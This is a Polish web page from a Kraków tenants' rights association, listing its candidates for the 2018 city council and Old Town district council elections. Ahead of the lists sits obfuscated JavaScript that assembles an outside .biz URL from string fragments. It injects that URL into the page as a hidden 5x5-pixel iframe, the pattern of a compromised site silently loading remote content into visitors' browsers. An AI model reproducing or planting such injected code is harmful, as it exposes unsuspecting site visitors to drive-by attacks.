jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); KANDYDACI POPIERANI PRZEZ STOWARZYSZENIE

 Nasi kandydaci do Rady Miasta Krakowa 

 

  • OKRĘG NR 1 (Stare Miasto, Zwierzyniec, Bronowice -dzielnice: I, VI, VII )

        Nasza Kandydatka  - DOROTA WNĘK

        Lista Nr 18 KWW Kraków Przeciw Igrzyskom, Miejsce 3.

  • OKRĘG NR 6 (Cztżyny, Mistrzejowice, Wzgórza Krzesławickie -dzielnice: XIV, XV i XVII)

         Nasza Kandydatka - DANUTA KOROTKIEWICZ

         Lista Nr 18  KWW Kraków Przeciw Igrzyskom, Miejsce 3.

 

  • OKRĘG NR 7 (Nowa Huta, Bieńczyce - dzielnice: XVI i XVIII)

          Nasza Kandydatka - HALINA GOCIEWICZ

          Lista Nr 18  KWW Kraków Przeciw Igrzyskom, Miejsce 3.

 

    Nasi kandydaci do Rady Dzielnicy I – Stare Miasto

    Okręg 1 Tylek Anna Maria

    Okręg 2 Włodarczyk Bogumił

    Okręg 3 Balcewicz Jacek

    Okręg 4 Pasternak Wojciech

    Okręg 5 Ziąber Anna

    Okręg 7 Pittner Jadwiga

    Okręg 8  Gociewicz Halina

    Okręg 12  Wyszyńska Elżbieta

    Okręg 13  Kucia Maciej

    Okręg 14  Bochenek Małgorzata

    Okręg 16 Balbus-Kucia Maria

    Okręg 17  Zarzycka-Rzeźnik Barbara

    Okręg 18  Siwek Jadwiga

    Okręg 21 Sęczek Olgierd

 

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.